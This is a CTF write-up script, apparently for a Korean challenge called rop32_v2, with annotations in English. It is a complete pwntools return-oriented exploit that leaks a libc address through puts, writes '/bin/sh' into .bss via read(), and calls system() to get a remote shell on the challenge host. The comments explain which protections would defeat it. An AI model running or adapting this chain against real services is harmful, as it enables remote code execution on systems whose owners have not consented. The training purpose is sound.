rop32 문제에서 버퍼 크기와 함수만 달라졌습니다.
from pwn import *
# CTF write-up script: a three-stage return-oriented chain against the 32-bit
# binary ./rop32_v2, built with pwntools. Each stage overflows the same buffer
# in vuln() and then returns to vuln() so the next stage can be sent.
#
# Reading this defensively, the chain depends on three properties of the target
# (the binary is not shown here, so these are inferred - confirm with checksec):
#   * the overflow reaches the saved return address unchecked (no stack canary),
#   * code addresses are fixed (hard-coded gadgets below => presumably non-PIE),
#   * a libc pointer can be printed back, which defeats ASLR for libc.
# Removing any one of them (bounded read, -fstack-protector, PIE) breaks it.
#
# NOTE(review): 'A' * n + p32(...) mixes str with the packer's return value;
# that concatenation only works on Python 2 - on Python 3 p32() returns bytes.
context.log_level = 'debug'  # pwntools debug level: logs all traffic sent/received
e = ELF('./rop32_v2')  # local copy of the target, used for plt/got/sym/bss lookups
p = remote("sunrin.site", 9004)  # challenge service
libc = ELF('./libc.so.6')  # used only for symbol offsets; assumes it matches the remote libc - TODO confirm
# Hard-coded gadget addresses inside the binary. Judging by the names and by how
# they are used below: "pop; ret" (skips 1 argument) and "pop; pop; pop; ret"
# (skips 3 arguments) - verify against the binary.
pret = 0x080486bb
pppret = 0x080486b9
# Stage 1: leak the runtime address of puts.
# Padding is 0x24 + 4 bytes; presumably the buffer-to-saved-EBP distance plus the
# saved EBP itself, so the next dword lands on the return address.
payload = 'A' * (0x24 + 4)
payload += p32(e.plt['puts'])   # call puts(...)
payload += p32(pret)            # return address for puts: drop its one argument
payload += p32(e.got['puts'])   # argument: GOT slot holding puts' resolved address
payload += p32(e.sym['vuln'])   # re-enter vuln() for the next stage
p.sendlineafter(": \n", payload)
# Reads up to and including the first 0xf7 byte and unpacks it as a 32-bit value.
# assumes the reply up to that byte is exactly the 4-byte little-endian pointer
# (u32 needs exactly 4 bytes) - any extra output before it would break this.
puts = u32(p.recvuntil('\xf7'))
base = puts - libc.sym['puts']        # libc load base derived from the leak
system = base + libc.sym['system']    # runtime address of system()
binsh = e.bss() + 0x10  # scratch address in .bss, 0x10 past its start, to hold a string
# Stage 2: read(0, binsh, 0x20) - copy up to 0x20 bytes from stdin into .bss.
payload = 'A' * (0x24 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)          # return address for read: drop its three arguments
payload += p32(0)               # fd 0 (stdin)
payload += p32(binsh)           # destination buffer
payload += p32(0x20)            # byte count
payload += p32(e.sym['vuln'])   # re-enter vuln() for the final stage
p.sendline(payload)
p.sendline('/bin/sh\x00')  # data consumed by the read() call above
# Stage 3: system(binsh). The 4 filler bytes occupy system's return-address slot.
payload = 'A' * (0x24 + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)
p.sendline(payload)
p.interactive()  # hand the connection over to the terminal